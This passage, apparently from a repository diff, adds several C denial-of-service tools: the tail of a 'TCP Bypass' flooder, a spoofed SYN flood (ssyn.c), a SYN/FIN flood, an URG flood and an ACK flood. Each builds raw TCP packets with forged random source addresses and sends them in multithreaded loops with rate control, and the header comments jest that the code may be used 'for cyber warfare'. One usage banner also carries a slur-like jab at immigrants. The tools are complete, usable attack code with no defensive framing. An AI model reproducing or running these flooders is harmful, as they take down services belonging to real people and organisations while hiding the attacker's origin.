memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
|
||||
memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
|
||||
|
||||
tcph->check = checksum_tcp_packet( (unsigned short*) pseudogram , psize);
|
||||
int one = 1;
|
||||
const int *val = &one;
|
||||
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
|
||||
{
|
||||
exit(0);
|
||||
}
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
}
|
||||
int randommexico(int min, int max) {
|
||||
static bool first = true;
|
||||
if (first) {
|
||||
srand( time(NULL) );
|
||||
first = false;
|
||||
}
|
||||
return min + rand() % (max + 1 - min);
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "[!] Sybex 3.0 Priv8 TCP Bypass by Alemalakra.\n");
|
||||
fprintf(stdout, "[!] Usage: %s <IP> <PORT> <THREADS> <TIME> <PPS>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int multiplier = 20;
|
||||
pps = 0;
|
||||
limiter = 0;
|
||||
|
||||
// Arguments of Method.
|
||||
|
||||
floodport = atoi(argv[2]);
|
||||
void * target = argv[1];
|
||||
int maxim_pps = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[3]);
|
||||
lenght_pkt = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int alem = 0;
|
||||
int i;
|
||||
for(alem = 0;alem<num_threads;alem++){
|
||||
pthread_create( &thread[alem], NULL, &mexico, (void *)argv[1]); // Target
|
||||
}
|
||||
fprintf(stdout, "[!] Sending attack, Please stop inmigrants!\n");
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,169 @@
|
|||
/*
|
||||
Compile:
|
||||
apt-get update
|
||||
apt-get install gcc
|
||||
gcc ssyn.c -pthread -o ssyn
|
||||
Usage: ./ssyn ip port time
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <pthread.h>
|
||||
#include <errno.h>
|
||||
|
||||
#define THREADS 5
|
||||
|
||||
|
||||
typedef struct pthread_param
|
||||
{
|
||||
int argc;
|
||||
char **argv;
|
||||
};
|
||||
|
||||
typedef struct pseudo_header
|
||||
{
|
||||
unsigned int source_address;
|
||||
unsigned int dest_address;
|
||||
unsigned char placeholder;
|
||||
unsigned char protocol;
|
||||
unsigned short tcp_length;
|
||||
struct tcphdr tcp;
|
||||
};
|
||||
|
||||
/* Thanks for unknown author, this saves me some time */
|
||||
unsigned short csum(unsigned short *ptr,int nbytes) {
|
||||
register long sum;
|
||||
unsigned short oddbyte;
|
||||
register short answer;
|
||||
|
||||
sum=0;
|
||||
while(nbytes>1) {
|
||||
sum+=*ptr++;
|
||||
nbytes-=2;
|
||||
}
|
||||
if(nbytes==1) {
|
||||
oddbyte=0;
|
||||
*((u_char*)&oddbyte)=*(u_char*)ptr;
|
||||
sum+=oddbyte;
|
||||
}
|
||||
|
||||
sum = (sum>>16)+(sum & 0xffff);
|
||||
sum = sum + (sum>>16);
|
||||
answer=(short)~sum;
|
||||
|
||||
return(answer);
|
||||
}
|
||||
|
||||
int attack(int argc, char *argv[])
|
||||
{
|
||||
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
char packet[4096];
|
||||
struct iphdr *iph = (struct iphdr *) packet;
|
||||
struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
|
||||
struct sockaddr_in sin;
|
||||
struct pseudo_header psh;
|
||||
char ip[16];
|
||||
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr (argv[1]);
|
||||
|
||||
sprintf(ip, "%d.%d.%d.%d\n", rand() % 223, rand() % 255, rand() % 255, rand() % 255);
|
||||
|
||||
memset (packet, 0, 4096);
|
||||
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
|
||||
iph->id = htonl (54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = 255;
|
||||
iph->protocol = IPPROTO_TCP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr(ip);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
|
||||
iph->check = csum ((unsigned short *) packet, iph->tot_len >> 1);
|
||||
|
||||
tcph->source = htons (1234);
|
||||
tcph->dest = htons (80);
|
||||
tcph->seq = 0;
|
||||
tcph->ack_seq = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->fin=0;
|
||||
tcph->syn=1;
|
||||
tcph->rst=0;
|
||||
tcph->psh=0;
|
||||
tcph->ack=0;
|
||||
tcph->urg=0;
|
||||
tcph->window = htons (5840);
|
||||
tcph->check = 0;/* We fill this in later */
|
||||
tcph->urg_ptr = 0;
|
||||
|
||||
psh.source_address = inet_addr(ip);
|
||||
psh.dest_address = sin.sin_addr.s_addr;
|
||||
psh.placeholder = 0;
|
||||
psh.protocol = IPPROTO_TCP;
|
||||
psh.tcp_length = htons(20);
|
||||
|
||||
memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
|
||||
|
||||
tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
|
||||
|
||||
//IP_HDRINCL needed for own headers
|
||||
int one = 1;
|
||||
const int *val = &one;
|
||||
int sockop = setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one));
|
||||
if (sockop < 0)
|
||||
{
|
||||
perror ("[x] Error msg: ");
|
||||
printf ("[x] Cannot set socket options: %i (are we r00t?)\n", errno);
|
||||
// exit(-1);
|
||||
}
|
||||
|
||||
if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
|
||||
printf ("[x] Error sending packet\n");
|
||||
|
||||
close(s);
|
||||
return 0;
|
||||
}
|
||||
|
||||
void *thread_attack(void *thread_params)
|
||||
{
|
||||
struct pthread_param *params = thread_params;
|
||||
|
||||
while (1)
|
||||
attack(params->argc, params->argv);
|
||||
}
|
||||
|
||||
int main (int argc, char *argv[])
|
||||
{
|
||||
int i;
|
||||
printf("Spoofed SYN Attack\n");
|
||||
|
||||
srand(time(0));
|
||||
|
||||
if (argc != 4)
|
||||
{
|
||||
printf("Usage: %s <destip> <destport> <time in seconds>\n", argv[0]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
pthread_t ssyn_attack[THREADS];
|
||||
|
||||
struct pthread_param params;
|
||||
params.argc = argc;
|
||||
params.argv = argv;
|
||||
|
||||
for (i = 0; i < THREADS; i++)
|
||||
pthread_create( &ssyn_attack[i], NULL, thread_attack, (void*) ¶ms);
|
||||
|
||||
|
||||
printf("[*] Attacking..\n");
|
||||
sleep(atoi(argv[3]));
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
|
@ -0,0 +1,201 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->fin = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,194 @@
|
|||
/*
|
||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->urg = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (rand() % 20480);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, ":: cant open raw socket. got root?\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons (rand() % 20480);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, ":: motherfucking error.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, ":: sending all the packets..\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,216 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 65534
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = rand();
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->ack = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = rand();
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Improper ACK flood parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 100;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,197 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
